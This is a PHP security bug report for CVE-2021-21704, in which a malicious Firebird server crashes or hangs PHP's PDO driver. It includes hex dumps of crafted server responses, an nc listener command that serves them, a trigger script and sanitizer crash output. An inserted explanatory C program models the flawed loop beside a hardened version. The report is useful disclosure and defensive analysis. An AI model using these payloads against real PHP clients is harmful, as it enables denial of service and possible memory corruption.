CVE-2021-21704: PHP :: Sec Bug #76450 :: SIGSEGV in firebird_stmt_execute
In PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using Firebird PDO driver extension, a malicious database server could cause crashes in various database functions, such as getAttribute(), execute(), fetch() and others by returning invalid response data that is not parsed correctly by the driver. This can result in crashes, denial of service or potentially memory corruption.
Sec Bug #76450
SIGSEGV in firebird_stmt_execute
Submitted:
2018-06-11 20:02 UTC
Modified:
2021-06-28 04:40 UTC
From:
trichimtrich at gmail dot com
Assigned:
stas
Status:
Closed
Package:
PDO Firebird
PHP Version:
7.3.0alpha1
OS:
Private report:
No
CVE-ID:
2021-21704
[2018-06-11 20:02 UTC] trichimtrich at gmail dot com
Description:
A bug in the pdo_firebird module allows a malicious Firebird server or man-in-the-middle attacker to crash PHP.
Bug in the result parsing of "exec procedure" in statement query. The response is not validated before calculation, which leads to a crash or hangs PHP forever.
Vulnerable code in \php-src\ext\pdo_firebird\firebird_statement.c, lines 134-141:

    if (result[0] == isc_info_sql_records) {
        unsigned i = 3, result_size = isc_vax_integer(&result[1], 2);
        while (result[i] != isc_info_end && i < result_size) {
            short len = (short) isc_vax_integer(&result[i + 1], 2);
            if (result[i] != isc_info_req_select_count) {
                affected_rows += isc_vax_integer(&result[i + 3], len);
            }
            i += len + 3;
result_size is not verified. len uses the short type, so we can set len = -3 and make PHP hang forever.
$ ./php --version
PHP 7.3.0-dev (cli) (built: Jun 9 2018 04:47:18) ( NTS )
Copyright © 1997-2018 The PHP Group
Zend Engine v3.3.0-dev, Copyright © 1998-2018 Zend Technologies
Test script:
$ xxd stmt_exec_procedure.bin
00000000: 0000 005e ffff 800f 0000 0001 0000 0005
00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41
00000020: 7574 6800 0000 0000 0000 0000 0000 005c
00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41
00000040: 7574 6800 0000 0000 0000 0000 0000 0009
00000050: 0000 0000 0000 0000 0000 0000 0000 0000
00000060: 0000 0001 0000 0000 0000 0000 0000 0009
00000070: 0000 0001 0000 0000 0000 0000 0000 0000
00000080: 0000 0001 0000 0000 0000 0000 0000 0009
00000090: 0000 0002 0000 0000 0000 0000 0000 0000
000000a0: 0000 0001 0000 0000 0000 0000 0000 0009
000000b0: 0000 0000 0000 0000 0000 0000 0000 001f
000000c0: 1504 0008 0000 001b 0400 0200 0000 0507
000000d0: 0400 0000 0000 0407 0400 0000 0000 0100
000000e0: 0000 0001 0000 0000 0000 0000 0000 0009
000000f0: 0000 0001 0000 0000 0000 0000 0000 0000
00000100: 0000 0001 0000 0000 0000 0000 0000 0009
00000110: 0000 0002 0000 0000 0000 0000 0000 0021
00000120: 17ff ff0f feff 0000 0000 1004 0000 0000
00000130: 000d 0400 0000 0000 0e04 0000 0000 0002
00000140: 0100 0000 0000 0001 0000 0000 0000 0000
00000150: 0000 0009 0000 0000 0000 0000 0000 0000
00000160: 0000 0000 0000 0001 0000 0000 0000 0000
00000170: 0000 0009 ffff ffff 0000 0000 0000 0000
00000180: 0000 0000 0000 0001 0000 0000 0000 0000
00000190: 0000 0009 0000 0000 0000 0000 0000 0000
000001a0: 0000 0000 0000 0001 0000 0000 0000 0000
000001b0: 0000 0009 0000 0000 0000 0000 0000 0000
000001c0: 0000 0000 0000 0001 0000 0000 0000 0000
$ nc -lvp 3050 < stmt_exec_procedure.bin
$ cat fire_stmt_exec.php
<?php
$dsn = 'firebird:dbname=localhost:employee;charset=utf8;';
$username = 'SYSDBA';
$password = 'masterkey';

$dbh = new PDO($dsn, $username, $password, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$sql = "EXECUTE PROCEDURE test_proc 123";
$query = $dbh->prepare($sql);
$query->execute();
?>
Expected result:
No crash No hang
Actual result:
$ ./php fire_stmt_exec.php
ASAN:DEADLYSIGNAL
=================================================================
==5413==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd68135687 (pc 0x000000cdbf9d bp 0x7ffd6812c1b0 sp 0x7ffd6812c060 T0)
    #0 0xcdbf9c in firebird_stmt_execute (/mnt/hgfs/share/htdocs/php+0xcdbf9c)
    #1 0xcc55eb in zim_PDOStatement_execute (/mnt/hgfs/share/htdocs/php+0xcc55eb)
    #2 0x12e1872 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (/mnt/hgfs/share/htdocs/php+0x12e1872)
    #3 0x1212bcf in execute_ex (/mnt/hgfs/share/htdocs/php+0x1212bcf)
    #4 0x121320b in zend_execute (/mnt/hgfs/share/htdocs/php+0x121320b)
    #5 0x11175c0 in zend_execute_scripts (/mnt/hgfs/share/htdocs/php+0x11175c0)
    #6 0xfa4878 in php_execute_script (/mnt/hgfs/share/htdocs/php+0xfa4878)
    #7 0x1412cc4 in do_cli (/mnt/hgfs/share/htdocs/php+0x1412cc4)
    #8 0x1410e67 in main (/mnt/hgfs/share/htdocs/php+0x1410e67)
    #9 0x7f4208d6d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #10 0x43d878 in _start (/mnt/hgfs/share/htdocs/php+0x43d878)

SUMMARY: AddressSanitizer: stack-overflow (/mnt/hgfs/share/htdocs/php+0xcdbf9c) in firebird_stmt_execute
==5413==ABORTING
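The loop the report quotes, as an added example that is not code from php-src, from Firebird, or from the reporter: a model of the isc_info_sql_records walk, instrumented to return a status where the original would read past its 64-byte stack buffer or spin forever, beside a bounds-checked rewrite. The two PoC blocks are the 33 info bytes that follow the 0x21 length at offset 0x11c of the xxd dumps above; the well-formed block and the honest-size/negative-length block are constructed; vax_integer reimplements the little-endian decoding of Firebird's isc_vax_integer; and the checks in hardened_parse are this example's own, not the fix that shipped in PHP 7.3.29, 7.4.21 and 8.0.8.

```c
/* Added example, not code from php-src or Firebird: the isc_info_sql_records walk
 * quoted in the report, instrumented to report instead of crashing, beside a
 * bounds-checked rewrite whose checks are this example's own, not PHP's fix. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define isc_info_end              1   /* item codes as in Firebird's ibase.h */
#define isc_info_req_select_count 13
#define isc_info_sql_records      23
#define RESULT_BUF 64                 /* the PDO driver's info buffer is a 64-byte stack array */
#define ITER_CAP   100000             /* instrumentation only; the real loop has no cap */
enum walk_status { WALK_OK, WALK_OOB_READ, WALK_HANG };

/* Reimplements isc_vax_integer: little-endian; a negative length decodes to 0. */
static long vax_integer(const unsigned char *p, short length)
{
    long value = 0;
    for (int shift = 0; --length >= 0; shift += 8) value += (long) *p++ << shift;
    return value;
}

/* The loop quoted in the report. Each result[] access is preceded by a bounds check the
 * original lacks: a read past the buffer returns WALK_OOB_READ, spinning returns WALK_HANG. */
static enum walk_status vulnerable_walk(const unsigned char *resp, size_t n,
                                        long *affected_rows, unsigned *iterations)
{
    unsigned char result[RESULT_BUF] = {0};
    memcpy(result, resp, n < sizeof result ? n : sizeof result);
    *affected_rows = 0; *iterations = 0;
    if (result[0] != isc_info_sql_records) return WALK_OK;
    unsigned i = 3, result_size = (unsigned) vax_integer(&result[1], 2);   /* server-controlled */
    for (;;) {
        if (i >= sizeof result) return WALK_OOB_READ;                /* result[i] */
        if (result[i] == isc_info_end || i >= result_size) break;
        if (++*iterations > ITER_CAP) return WALK_HANG;
        if (i + 3 > sizeof result) return WALK_OOB_READ;             /* result[i+1], result[i+2] */
        short len = (short) vax_integer(&result[i + 1], 2);         /* server-controlled, may be negative */
        if (result[i] != isc_info_req_select_count) {
            if (len > 0 && i + 3 + (unsigned) len > sizeof result) return WALK_OOB_READ;
            *affected_rows += vax_integer(&result[i + 3], len);     /* len < 0 silently adds 0 */
        }
        i += len + 3;   /* len == -3: i never moves (hang); len == -2: creeps forward one byte */
    }
    return WALK_OK;
}

/* Bounds-checked rewrite: the claimed length is checked against what was received, the
 * per-item length is unsigned and capped at the 4 bytes of an ISC_LONG, and every read is
 * checked against the end of the block first. Returns 0, or -1 if the block is malformed. */
static int hardened_parse(const unsigned char *resp, size_t n, long *affected_rows)
{
    unsigned char result[RESULT_BUF] = {0};
    *affected_rows = 0;
    if (n < 3 || n > sizeof result) return -1;
    memcpy(result, resp, n);
    if (result[0] != isc_info_sql_records) return -1;
    size_t end = 3 + (size_t) vax_integer(&result[1], 2);   /* length counts bytes after the header */
    if (end > n) return -1;                                  /* server claims more than it sent */
    size_t i = 3;
    while (i < end && result[i] != isc_info_end) {
        if (i + 3 > end) return -1;                          /* truncated item header */
        unsigned len = (unsigned) vax_integer(&result[i + 1], 2);
        if (len > 4 || i + 3 + len > end) return -1;         /* oversized or truncated value */
        if (result[i] != isc_info_req_select_count)
            *affected_rows += vax_integer(&result[i + 3], (short) len);
        i += 3 + len;                                        /* len >= 0, so i always advances */
    }
    return 0;
}

/* The 33 info bytes after the 0x21 length at offset 0x11c of the crash dump:
 * claimed size 0xffff, first item length fe ff (-2 as a short). */
static const unsigned char CRASH_BLOCK[] = {
    0x17,0xff,0xff, 0x0f,0xfe,0xff,0x00,0x00,0x00,0x00, 0x10,0x04,0x00,0x00,0x00,0x00,0x00,
    0x0d,0x04,0x00,0x00,0x00,0x00,0x00, 0x0e,0x04,0x00,0x00,0x00,0x00,0x00, 0x02,0x01 };
/* Same bytes from the hang PoC dump: only the length byte differs, fd ff == -3. */
static const unsigned char HANG_BLOCK[] = {
    0x17,0xff,0xff, 0x0f,0xfd,0xff,0x00,0x00,0x00,0x00, 0x10,0x04,0x00,0x00,0x00,0x00,0x00,
    0x0d,0x04,0x00,0x00,0x00,0x00,0x00, 0x0e,0x04,0x00,0x00,0x00,0x00,0x00, 0x02,0x01 };
/* Constructed well-formed block: update=1, delete=0, select=7 (not counted), insert=2. */
static const unsigned char GOOD_BLOCK[] = {
    0x17,0x1d,0x00, 0x0f,0x04,0x00,0x01,0x00,0x00,0x00, 0x10,0x04,0x00,0x00,0x00,0x00,0x00,
    0x0d,0x04,0x00,0x07,0x00,0x00,0x00, 0x0e,0x04,0x00,0x02,0x00,0x00,0x00, 0x01 };
/* Constructed: honest size claim, but the first item's length is fd ff again. */
static const unsigned char LEN_NEG3_BLOCK[] = {
    0x17,0x1d,0x00, 0x0f,0xfd,0xff,0x01,0x00,0x00,0x00, 0x10,0x04,0x00,0x00,0x00,0x00,0x00,
    0x0d,0x04,0x00,0x07,0x00,0x00,0x00, 0x0e,0x04,0x00,0x02,0x00,0x00,0x00, 0x01 };

int main(void)
{
    const unsigned char *blk[] = { GOOD_BLOCK, CRASH_BLOCK, HANG_BLOCK, LEN_NEG3_BLOCK };
    const size_t len[] = { sizeof GOOD_BLOCK, sizeof CRASH_BLOCK, sizeof HANG_BLOCK, sizeof LEN_NEG3_BLOCK };
    for (int k = 0; k < 4; k++) {
        long rows, hrows; unsigned it;
        int s = vulnerable_walk(blk[k], len[k], &rows, &it), h = hardened_parse(blk[k], len[k], &hrows);
        printf("block %d: vulnerable status %d (0=ok 1=oob-read 2=hang) after %u iteration(s), rows=%ld; hardened %s\n",
               k, s, it, rows, h == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

Run as a stand-alone program it prints one line per block: the well-formed block yields 3 affected rows under both parsers; the crash-dump block is flagged as an out-of-bounds read on its second pass (the -2 length advances i by one byte, and the next byte pair is then read as a length of 255 against a 64-byte buffer); both fd ff variants hit the iteration cap because i += len + 3 adds zero. hardened_parse rejects the two PoC blocks on their 0xffff size claim alone and the honest-size variant on the per-item length, which is why both checks are needed rather than either one.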
History
[2018-06-11 20:05 UTC] [email protected]
-Assigned To: +Assigned To: lwe
[2018-06-11 21:19 UTC] trichimtrich at gmail dot com
PoC hangs PHP
$ xxd stmt_exec_procedure.bin
00000000: 0000 005e ffff 800f 0000 0001 0000 0005
00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41
00000020: 7574 6800 0000 0000 0000 0000 0000 005c
00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41
00000040: 7574 6800 0000 0000 0000 0000 0000 0009
00000050: 0000 0000 0000 0000 0000 0000 0000 0000
00000060: 0000 0001 0000 0000 0000 0000 0000 0009
00000070: 0000 0001 0000 0000 0000 0000 0000 0000
00000080: 0000 0001 0000 0000 0000 0000 0000 0009
00000090: 0000 0002 0000 0000 0000 0000 0000 0000
000000a0: 0000 0001 0000 0000 0000 0000 0000 0009
000000b0: 0000 0000 0000 0000 0000 0000 0000 001f
000000c0: 1504 0008 0000 001b 0400 0200 0000 0507
000000d0: 0400 0000 0000 0407 0400 0000 0000 0100
000000e0: 0000 0001 0000 0000 0000 0000 0000 0009
000000f0: 0000 0001 0000 0000 0000 0000 0000 0000
00000100: 0000 0001 0000 0000 0000 0000 0000 0009
00000110: 0000 0002 0000 0000 0000 0000 0000 0021
00000120: 17ff ff0f fdff 0000 0000 1004 0000 0000
00000130: 000d 0400 0000 0000 0e04 0000 0000 0002
00000140: 0100 0000 0000 0001 0000 0000 0000 0000
00000150: 0000 0009 0000 0000 0000 0000 0000 0000
00000160: 0000 0000 0000 0001 0000 0000 0000 0000
00000170: 0000 0009 ffff ffff 0000 0000 0000 0000
00000180: 0000 0000 0000 0001 0000 0000 0000 0000
00000190: 0000 0009 0000 0000 0000 0000 0000 0000
000001a0: 0000 0000 0000 0001 0000 0000 0000 0000
000001b0: 0000 0009 0000 0000 0000 0000 0000 0000
000001c0: 0000 0000 0000 0001 0000 0000 0000 0000
[2018-06-28 08:31 UTC] trichimtrich at gmail dot com
any update for this one?
[2021-04-30 12:12 UTC] [email protected]
-Status: Assigned +Status: Verified -Assigned To: lwe +Assigned To: cmb
[2021-05-05 12:54 UTC] [email protected]
-Assigned To: cmb +Assigned To: stas
[2021-06-21 05:10 UTC] [email protected]
-CVE-ID: +CVE-ID: 2021-21704
[2021-06-21 06:22 UTC] [email protected]
-Private report: No +Private report: Yes
[2021-06-28 04:41 UTC] [email protected]
-Status: Verified +Status: Closed